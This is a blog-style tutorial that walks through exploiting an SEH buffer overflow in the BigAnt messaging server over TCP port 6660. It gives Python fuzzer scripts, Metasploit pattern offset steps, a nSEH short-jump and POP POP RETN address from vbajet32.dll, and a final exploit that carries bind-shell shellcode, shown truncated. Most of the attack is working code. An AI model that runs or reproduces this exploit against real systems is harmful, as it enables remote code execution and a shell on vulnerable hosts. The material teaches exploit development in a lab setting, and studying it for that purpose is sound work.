Friday, 11 January 2013

FUZZING SEH

Now we will try to exploit the BigAnt application. Let's go through it step by step.
First, prepare the fuzzer (Python 2):
import socket

# Lab target: the BigAnt server (AntServer) listening on TCP 6660
target_address = "192.168.56.101"
target_port = 6660

# "USV " command, 2500 'A' bytes (0x41), then the request terminator
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

After that, run BigAnt.

Then open OllyDbg and attach it to the BigAnt process. Choose AntServer.

Run the fuzzer. To see the result, select View - SEH chain. The result is:

In the image above, BigAnt crashes on the 2500-byte buffer we sent. The SEH chain is overwritten with 41 bytes (our 'A' characters), as shown above.

Next, create a 2500-byte unique pattern with pattern_create:
root@bt:/opt/metasploit/msf3/tools# ./pattern_create.rb 2500

Enter the result into the fuzzer:
import socket

# Lab target: the BigAnt server (AntServer) listening on TCP 6660
target_address = "192.168.56.101"
target_port = 6660

# "USV " command followed by the 2500-byte output of pattern_create.rb
buffer = "USV " + "Aa0Aa1Aa2Aa3A . ."  # pattern_create 2500
buffer += "\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

After that, restart OllyDbg and BigAnt and rerun the fuzzer. The result:

Take the value now shown in the SEH chain and feed it to pattern_offset:
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 42326742
966

The conclusion is that 966 bytes of buffer are needed to reach the SEH handler.
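To show where the 966 comes from, here is an added Python example (not from the original post) that rebuilds the Metasploit cyclic pattern, looks up the 0x42326742 handler value seen in the SEH chain, and maps that offset onto the buffer layout used later in the post; the function and parameter names are my own.

```python
import struct
import string


def cyclic_pattern(length):
    """Build the Metasploit-style pattern (Aa0Aa1...Az9Ba0...) of `length` bytes.
    Every 4-byte window is unique within the first 20280 bytes, so any 4 bytes
    read back from a register or the SEH record map to exactly one offset."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, length=2500):
    """Offset of a 32-bit value (as displayed by the debugger) inside the pattern.
    The value is tried little-endian first (how x86 stores it), then big-endian;
    returns -1 if it does not occur."""
    pattern = cyclic_pattern(length)
    for fmt in ("<I", ">I"):
        needle = struct.pack(fmt, value).decode("latin-1")
        idx = pattern.find(needle)
        if idx != -1:
            return idx
    return -1


def seh_layout(handler_offset, prefix="USV "):
    """Translate the pattern_offset result into the layout of the full request.
    The pattern followed the 4-byte "USV " prefix, so the overwritten handler sits
    at len(prefix) + handler_offset in the full buffer, the nSEH record 4 bytes
    before it, and the NOP sled fills everything between the prefix and nSEH."""
    handler = len(prefix) + handler_offset
    nseh = handler - 4
    return {"nop_sled": nseh - len(prefix), "nseh": nseh, "handler": handler}


if __name__ == "__main__":
    off = pattern_offset(0x42326742)          # value from the SEH chain view
    print("handler offset in pattern:", off)  # 966, matching pattern_offset.rb
    print("request layout:", seh_layout(off))  # 962-byte sled, nSEH at 966
```

The 962-byte sled returned by seh_layout is exactly the "\x90" * 962 used in the final fuzzer below.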

Once we know the offset used for SEH, we enter the address of a POP POP RETN sequence from vbajet32.dll into the fuzzer.
To find that address in vbajet32.dll, select View - Executable modules and double-click VBAJET32. Then right-click - Search for - Sequence of commands, and type as below:



The result is:

Set a breakpoint on that address before running the fuzzer. If it is hit:

press Shift+F9 to pass the exception to the program and land in vbajet32.dll. Then press F7 to step through to the RETN instruction.


We need to jump 6 bytes forward over the SEH handler, but the nSEH record only gives us 4 bytes of space.
Therefore a 2-byte short jump (EB 06) followed by two NOPs is used. So we must modify the fuzzer:
import socket

# Lab target: the BigAnt server (AntServer) listening on TCP 6660
target_address = "192.168.56.101"
target_port = 6660

buffer = "USV "
buffer += "\x90" * 962               # NOP sled up to the nSEH record
buffer += "\xeb\x06\x90\x90"         # nSEH: short jump 6 bytes forward + 2 NOPs
buffer += "\x6A\x19\x9A\x0F"         # SEH handler: POP POP RETN in vbajet32.dll (little-endian)
buffer += "\x90" * (2500 - len(buffer))  # pad the request to 2500 bytes
buffer += "\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

Set the breakpoint as before; the result is:


Next, create the shellcode (payload) with msfweb:
root@bt:/pentest/exploits/framework2# ./msfweb
+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

Open the address above (127.0.0.1:55555) in your browser.

Insert the output of Generate Payload into the fuzzer:
import socket

# Lab target: the BigAnt server (AntServer) listening on TCP 6660
target_address = "192.168.56.101"
target_port = 6660

buffer = "USV "
buffer += "\x90" * 962               # NOP sled up to the nSEH record
buffer += "\xeb\x06\x90\x90"         # nSEH: short jump 6 bytes forward + 2 NOPs
buffer += "\x6A\x19\x9A\x0F"         # SEH handler: POP POP RETN in vbajet32.dll (little-endian)
buffer += "\x90" * 16                # small NOP pad before the payload
buffer += "\xda\xdf\x29\xc9 . ."     # bind shell generated by msfweb
buffer += "\x90" * (2500 - len(buffer))  # pad the request to 2500 bytes
buffer += "\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

SUCCESSFUL


GOOD LUCK, AND TRY HARDER !!!
